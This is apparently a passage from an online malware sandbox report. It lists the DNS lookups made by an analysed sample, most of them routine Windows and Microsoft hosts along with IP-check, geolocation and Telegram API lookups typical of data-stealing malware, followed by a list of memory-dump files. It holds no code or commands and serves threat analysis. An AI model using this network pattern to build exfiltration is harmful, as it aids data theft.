              2.18.105.186

              DNS Request

              dmd.metaservices.microsoft.com

              DNS Response

              20.189.118.208

              DNS Request

              oneocsp.microsoft.com

              DNS Response

              204.79.197.203

              DNS Request

              nexusrules.officeapps.live.com

              DNS Response

              52.109.12.18

              DNS Request

              config.edge.skype.com

              DNS Response

              13.107.42.23

              DNS Request

              tsfe.trafficshaping.dsp.mp.microsoft.com

              DNS Response

              20.54.110.119

              DNS Request

              ctldl.windowsupdate.com

              DNS Response

              95.101.78.82
              88.221.144.130

              DNS Request

              login.live.com

              DNS Response

              20.190.159.138
              40.126.31.143
              20.190.159.134
              20.190.159.132
              40.126.31.4
              40.126.31.135
              40.126.31.6
              40.126.31.137

              DNS Request

              ocsp.digicert.com

              DNS Response

              93.184.220.29

              DNS Request

              settings-win.data.microsoft.com

              DNS Response

              20.73.194.208

              DNS Request

              slscr.update.microsoft.com

              DNS Response

              52.242.101.226

              DNS Request

              fe3cr.delivery.mp.microsoft.com

              DNS Response

              20.54.89.15
              52.242.97.97

              DNS Request

              fe3cr.delivery.mp.microsoft.com

              DNS Response

              52.152.108.96
              52.242.97.97

              DNS Request

              slscr.update.microsoft.com

              DNS Response

              40.125.122.176

              DNS Request

              checkip.dyndns.org

              DNS Response

              158.101.44.242
              132.226.8.169
              216.146.43.71
              132.226.247.73
              216.146.43.70
              193.122.6.168
              193.122.130.0

              DNS Request

              freegeoip.app

              DNS Response

              172.67.188.154
              104.21.19.200

              DNS Request

              api.telegram.org

              DNS Response

              149.154.167.220

              DNS Request

              ctldl.windowsupdate.com

              DNS Response

              93.184.221.240

              DNS Request

              fs.microsoft.com

              DNS Response

              104.81.140.70

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2160-175-0x0000022002A00000-0x0000022002A10000-memory.dmp

              Filesize

              64KB

            • memory/2160-174-0x0000022002980000-0x0000022002990000-memory.dmp

              Filesize

              64KB

            • memory/4180-171-0x00000000076C0000-0x00000000076C1000-memory.dmp

              Filesize

              4KB

            • memory/4180-169-0x0000000005A20000-0x0000000005FC6000-memory.dmp

              Filesize

              5.6MB

            • memory/4180-166-0x0000000005A90000-0x0000000005A91000-memory.dmp

              Filesize

              4KB

            • memory/4180-160-0x0000000000400000-0x0000000000476000-memory.dmp

              Filesize

              472KB

            • memory/4564-152-0x00000000058B0000-0x00000000058B1000-memory.dmp

              Filesize

              4KB

            • memory/4564-158-0x0000000008A20000-0x0000000008AC0000-memory.dmp

              Filesize

              640KB

            • memory/4564-157-0x00000000063F0000-0x0000000006474000-memory.dmp

              Filesize

              528KB

            • memory/4564-156-0x0000000005250000-0x0000000005260000-memory.dmp

              Filesize

              64KB

            • memory/4564-155-0x00000000050A0000-0x00000000050A1000-memory.dmp

              Filesize

              4KB

            • memory/4564-154-0x0000000004E90000-0x0000000004E91000-memory.dmp

              Filesize

              4KB

            • memory/4564-153-0x0000000004D50000-0x00000000052F6000-memory.dmp

              Filesize

              5.6MB

            • memory/4564-146-0x00000000000C0000-0x00000000000C1000-memory.dmp

              Filesize

              4KB

            • memory/4564-151-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

              Filesize

              4KB

            • memory/4564-150-0x0000000004D50000-0x0000000004D51000-memory.dmp

              Filesize

              4KB

            • memory/4564-149-0x0000000005300000-0x0000000005301000-memory.dmp

              Filesize

              4KB

            • memory/4564-148-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

              Filesize

              4KB

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.